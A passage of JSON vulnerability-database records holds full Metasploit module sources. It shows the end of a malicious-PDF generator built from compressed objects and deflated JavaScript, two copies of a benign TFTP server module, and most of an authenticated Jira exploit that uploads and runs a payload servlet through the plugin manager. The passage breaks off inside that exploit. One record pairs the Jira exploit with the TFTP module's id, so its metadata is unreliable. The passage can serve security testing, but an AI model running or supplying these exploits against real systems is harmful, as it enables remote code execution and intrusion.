\"eJzjjdb3dHZ2SixOTVEwNlAwUAiK5QUANj4E9Q==\")\n add_compressed(30, \"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\")\n add_compressed(38, \"eJxNjbEOgjAYhJ+Ad/hHWPgplIoJaVIwaGIwRGsciAtYCFGLQx18e1vi4HDDXe6+8/IcBdAEIjiiaKw7QEqc4xw3wsedKmYgMcjBhmOAFVCsJBZGYzUAS9OEYb23u2LbkjCCn65YCr98TP0dnipA2QCxwAZitjwdVW/ayFajkBGasQwYIWGSUVitY7c+vTvzeSm8TLdRGZR+Z/SCqx3t/I92NaH1bDj3vvt1NZc=\")\n add_compressed(43, \"eJzjtbHR9wpWMDFTMFAI0g/W90osSwxOLsosKLGz4wUAaC0Hzw==\")\n add_compressed(51, 
\"eJxNjtEKgkAQRb9g/mG/wHHRTEF8kPCpyDIoEB/UJivQrXUF+/t2Y4seLnPhzj1ciGNMUzGXruMyo4Bzxwt9tozMXVSYCdkfXg9iHNc0dOrKAh83tZK3ueS2ZPTnK9zTKCbZ0qjxuRRtQarEfJVVSYLF1CjN+4DRkPG0be7UqiQZlaS6B8460CC7xQu/YziTBBd46gfOAjeyYRj9wiMMsAMazpb0BnLmPE4=\")\n\n js = Zlib::Deflate.deflate(js)\n add_object(46, \"\\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\\x0d#{js}\\x0dendstream\\x0d\")\n\n add_compressed(8, \"eJzjtbHRd84vzStRMNR3yywqLlGwVDBQCNL3SYQzAxKLUoHy5mBOSGZJTqqGT35yYo6CS2ZxtqadHS8AmCkTkg==\")\n add_compressed(9, \"eJzjtbHRd0ktLok2MlMwUAjSj4iMAtLmlkYKeaU5ObH6AYlFqXklChZgyWBXBUNTMCsksyQnVePff4YshmIGPYYShgqGEk07O14AWScVgw==\")\n add_compressed(17, \"eJzjtbHR90vMTS2ONjZVMFAIUjAyAFGxdna8AF4CBlg=\")\n add_compressed(18, \"eJzjtbHR90vMTS2ONrRUMFAIUjAyAFGxdna8AF4gBlo=\")\n add_compressed(19, \"eJzj1UjLzEm10tfXd67RL0nNLdDPKtYrqSjR5AUAaRoIEQ==\")\n add_compressed(20, \"eJzjtbHRdw7RKEmtKNEvyEnMzNPU93RRMDZVMFAI0vePNjIDMWL1g/WDA4DYU8HIECwTovHvP0MWQzGDHkMJQwVDiaZ+SLCGi5WRgaGJgbGxoaGhsampUZSmnR0vAOIUGEU=\")\n add_compressed(21, \"eJzjtbHRdwxVMLRUMFAI0g8J1nCxMjIwNDEwNjY0NDQ2NTWK0rSz4wUAmbEH3g==\")\n add_compressed(39, \"eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HXKz0nRd81Lzk/JzEtXMDFVMFAI0vdLzE0FqnHK1w8uTSqpLEjVDwEShmBSH2SAnR0vACeXGlQ=\")\n add_compressed(47, \"eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HfNS85PycxLVzAxVTBQCNL3S8xNBUvrB5cmlVQWpOqHAAlDMKkP0mtnxwsAqd8Y1w==\")\n add_compressed(48, \"eJzjtbHRd0osTnXLzyvRj0osSHPJzEtPSiwp1vdLzE0Firgk6QeXJpVUFqTqhwAJQzCpD1JuZ8cLAJhsFTA=\")\n add_compressed(45, \"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\")\n add_compressed(23, \"eJxNzLEKgzAQgOEn8B2ymVCqd4npUEQQXQsdCp0Tc4Ol9Ep6Qh+/gg7d/+8v2rYeMgWZ+TUGIT2eLWADziE65z0ewJYApdkqzrpPHEn1U+YYRCFWYOoLp3/sV2yxsacj+A1fM6dlolXv7k5RDeEtS6b9cZvlSfrxqeQrpuuKH+VYK70=\")\n\n @xref_offset = @pdf.length\n @pdf << xref_table << trailer(25) << startxref\n\n @pdf\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-11T04:46:54", "differentElements": ["cvelist", "cvss", "description", 
"published", "references", "sourceData", "sourceHref", "title"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-11T07:45:24", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-09-11T07:45:24"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:814D90A5E5ED67E300993BB603BFD072"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:E0E8BEBCCF52907348567BCF57CCF0A8"]}, {"type": "centos", "idList": ["CESA-2019:2836"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2199-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:3715636905442175414"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704533"]}, {"type": "cve", "idList": ["CVE-2017-18635", "CVE-2019-12656", "CVE-2019-12668", "CVE-2019-12667", "CVE-2019-12659", "CVE-2019-10098"]}, {"type": "threatpost", "idList": ["THREATPOST:55CF21CB5462B6A570AF12025F00CFA4", "THREATPOST:A639B5ED7B8EC135EA2B35B5F8EE6DEB"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4533-1:2A15F"]}, {"type": "hackread", "idList": ["HACKREAD:F001BF69EDFC7FC342D3D7AD9CBF631D"]}, {"type": "cisco", "idList": ["CISCO-SA-20190925-SBXSS", "CISCO-SA-20190925-IOX", "CISCO-SA-20190925-HTTPSERV-DOS", "CISCO-SA-20190925-XSS"]}], "modified": "2019-09-11T07:45:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 
'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-11T07:45:24", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "3d89a3b5af133f1627d72096317b7656", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", 
"description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-01T14:38:23", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.8, "vector": "NONE", "modified": "2019-10-01T14:38:23"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2950", "RHSA-2019:2949", "RHSA-2019:2946", "RHSA-2019:2938", "RHSA-2019:2937", "RHSA-2019:2936", "RHSA-2019:2935"]}, {"type": "thn", "idList": ["THN:86C3930A6E4C818EFA5133059C21FA57", "THN:7FC2242BEB1C8193593A4A37E13B4252", "THN:A947D0153E6D676ABBCCAB69CD1E73DB"]}, {"type": "rhino", "idList": ["RHINO:075E30117DB6F3FD8F52CE7802913F9F"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:E9D9579FDB3190A33994E35222FB271A"]}, {"type": "exploitdb", "idList": ["EDB-ID:47450", "EDB-ID:47448"]}, {"type": "cve", "idList": ["CVE-2019-4304", "CVE-2019-4305", "CVE-2019-10498"]}, {"type": "mssecure", "idList": ["MSSECURE:273B8840FBE34F82F327AD16742071E1"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5E10C725B6B846C3D9C332A6C5B43A8A"]}, {"type": "threatpost", "idList": ["THREATPOST:1E8692DD3729CF2A8B526A85F076513F"]}], "modified": "2019-10-01T14:38:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-01T14:38:23", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", 
"references": [], "cvelist": [], "lastseen": "2019-10-01T16:08:37", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.6, "vector": "NONE", "modified": "2019-10-01T16:08:37"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:1EBBC3A78AD76193EC9C78495D0E85A8", "THN:86C3930A6E4C818EFA5133059C21FA57", "THN:7FC2242BEB1C8193593A4A37E13B4252"]}, {"type": "redhat", "idList": ["RHSA-2019:2950", "RHSA-2019:2949", "RHSA-2019:2946", "RHSA-2019:2938", "RHSA-2019:2937", "RHSA-2019:2936", "RHSA-2019:2935"]}, {"type": "rhino", "idList": ["RHINO:075E30117DB6F3FD8F52CE7802913F9F"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:E9D9579FDB3190A33994E35222FB271A"]}, {"type": "exploitdb", "idList": ["EDB-ID:47450", "EDB-ID:47448"]}, {"type": "cve", "idList": ["CVE-2019-4304", "CVE-2019-4305", "CVE-2019-10498"]}, {"type": "mssecure", "idList": ["MSSECURE:273B8840FBE34F82F327AD16742071E1"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5E10C725B6B846C3D9C332A6C5B43A8A"]}, {"type": "threatpost", "idList": ["THREATPOST:1E8692DD3729CF2A8B526A85F076513F"]}], "modified": "2019-10-01T16:08:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n 
OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-01T16:08:37", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "0937cb8d06d4d025b65f5c91dcdba867", "type": "metasploit", "bulletinFamily": "exploit", "title": "Atlassian Jira Authenticated Upload Code Execution", "description": "This module can be used to execute a payload on Atlassian Jira via the Universal Plugin Manager(UPM). The module requires valid login credentials to an account that has access to the plugin manager. The payload is uploaded as a JAR archive containing a servlet using a POST request against the UPM component. 
The check command will test the validity of user supplied credentials and test for access to the plugin manager.\n", "published": "2018-02-22T15:43:36", "modified": "2019-04-26T16:09:33", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/", "https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/", "https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/"], "cvelist": [], "lastseen": "2019-10-05T10:04:14", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-10-05T10:04:14"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2251-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": "threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1945-1:55523"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876871", "OPENVAS:1361412562310876876"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}, {"type": "msupdate", "idList": ["MS:18552C40-7E36-4F15-960A-9717A4912AF1", "MS:2CA3D95F-1ECB-4850-AEB4-AFB63CD6374A", "MS:E08D28EF-D685-412C-B0BC-8CC26BF899C3", "MS:9668152F-78A1-44F9-A229-38E86189703A", "MS:16216817-6043-4587-A803-9B3A9F3A58CC", "MS:39AB456C-2A98-4234-80FE-A3032EE6D75E"]}], "modified": "2019-10-05T10:04:14"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jira_plugin_upload.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Atlassian Jira Authenticated Upload Code Execution',\n 'Description' => %q{\n This module can be used to execute a payload on Atlassian Jira via\n the Universal Plugin Manager(UPM). The module requires valid login\n credentials to an account that has access to the plugin manager.\n The payload is uploaded as a JAR archive containing a servlet using\n a POST request against the UPM component. The check command will\n test the validity of user supplied credentials and test for access\n to the plugin manager.\n },\n 'Author' => 'Alexander Gonzalez(dubfr33)',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/'],\n ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/'],\n ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/']\n ],\n 'Platform' => %w[java],\n 'Targets' =>\n [\n ['Java Universal',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => 'java'\n }\n ]\n ],\n 'DisclosureDate' => 'Feb 22 2018'))\n\n register_options(\n [\n Opt::RPORT(2990),\n OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),\n OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),\n OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])\n ])\n end\n\n def check\n login_res = query_login\n if 
login_res.nil?\n vprint_error('Unable to access the web application!')\n return CheckCode::Unknown\n end\n return CheckCode::Unknown unless login_res.code == 200\n @session_id = get_sid(login_res)\n @xsrf_token = login_res.get_html_document.at('meta[@id=\"atlassian-token\"]')\n return CheckCode::Unknown if @xsrf_token.nil? || @xsrf_token['content'].nil?\n @xsrf_token = @xsrf_token['content']\n\n auth_res = do_auth\n good_sid = get_sid(auth_res)\n good_cookie = \"atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}\"\n res = query_upm(good_cookie)\n if res.nil?\n vprint_error('Unable to access the web application!')\n return CheckCode::Unknown\n elsif res.code == 200\n return Exploit::CheckCode::Appears\n else\n vprint_status('Something went wrong, make sure host is up and options are correct!')\n vprint_status(\"HTTP Response Code: #{res.code}\")\n return Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n unless access_login?\n fail_with(Failure::Unknown, 'Unable to access the web application!')\n end\n print_status('Retrieving Session ID and XSRF token...')\n auth_res = do_auth\n good_sid = get_sid(auth_res)\n good_cookie = \"atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}\"\n res = query_for_upm_token(good_cookie)\n if res.nil?\n fail_with(Failure::Unknown, 'Unable to retrieve UPM token!')\n end\n upm_token = res.headers['upm-token']\n upload_exec(upm_token, good_cookie)\n end\n\n # Upload, execute, and remove servlet\n def upload_exec(upm_token, good_cookie)\n contents = ''\n name = Rex::Text.rand_text_alpha(8..12)\n\n atlassian_plugin_xml = %Q{\n <atlassian-plugin name=\"#{name}\" key=\"#{name}\" plugins-version=\"2\">\n <plugin-info>\n <description></description>\n <version>1.0</version>\n <vendor name=\"\" url=\"\" />\n\n <param name=\"post.install.url\">/plugins/servlet/metasploit/PayloadServlet</param>\n <param name=\"post.upgrade.url\">/plugins/servlet/metasploit/PayloadServlet</param>\n\n </plugin-info>\n\n <servlet name=\"#{name}\" 
key=\"metasploit.PayloadServlet\" class=\"metasploit.PayloadServlet\">\n <description>\"#{name}\"</description>\n <url-pattern>/metasploit/PayloadServlet</url-pattern>\n </servlet>\n\n </atlassian-plugin>\n }\n\n # Generates .jar file for upload\n zip = payload.encoded_jar\n zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)\n\n servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')\n zip.add_file('/metasploit/PayloadServlet.class', servlet)\n\n contents = zip.pack\n\n boundary = rand_text_numeric(27)\n\n data = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"plugin\\\"; \"\n data << \"filename=\\\"#{name}.jar\\\"\\r\\nContent-Type: application/x-java-archive\\r\\n\\r\\n\"\n data << contents\n data << \"\\r\\n--#{boundary}--\"\n\n print_status(\"Attempting to upload #{name}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'rest/plugins/1.0/'),\n 'vars_get' =>\n {\n 'token' => \"#{upm_token}\"\n },\n 'method' => 'POST',\n 'data' => data,\n 'headers' =>\n {\n 'Content-Type' => 'multipart/form-data; boundary=' + boundary,\n 'Cookie' => good_cookie.to_s\n }\n }, 25)\n\n unless res && res.code == 202\n print_status(\"Error uploading #{name}\")\n print_status(\"HTTP Response Code: #{res.code}\")\n print_status(\"Server Response: #{res.body}\")\n return\n end\n\n print_status(\"Successfully uploaded #{name}\")\n print_status(\"Executing #{name}\")\n Rex::ThreadSafe.sleep(3)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),\n 'method' => 'GET',\n 'cookie' => good_cookie.to_s\n })\n\n print_status(\"Deleting #{name}\")\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, \"rest/plugins/1.0/#{name}-key\"),\n 'method' => 'DELETE',\n 'cookie' => good_cookie.to_s\n })\n end\n\n def access_login?\n res = query_login\n if res.nil?\n fail_with(Failure::Unknown, 'Unable to access the web application!')\n end\n return false unless res 
&& res.code == 200\n @session_id = get_sid(res)\n @xsrf_token = res.get_html_document.at('meta[@id=\"atlassian-token\"]')\n return false if @xsrf_token.nil? || @xsrf_token['content'].nil?\n\n @xsrf_token = @xsrf_token['content']\n return true\n end\n\n # Sends GET request to login page so the HTTP response can be used\n def query_login\n send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'))\n end\n\n # Queries plugin manager to verify access\n def query_upm(good_cookie)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'),\n 'method' => 'GET',\n 'cookie' => good_cookie.to_s\n })\n end\n\n # Queries API for response containing upm_token\n def query_for_upm_token(good_cookie)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),\n 'method' => 'GET',\n 'cookie' => good_cookie.to_s\n })\n end\n\n # Authenticates to webapp with user supplied credentials\n def do_auth\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'),\n 'method' => 'POST',\n 'cookie' => \"atlassian.xsrf.token=#{@xsrf_token}; 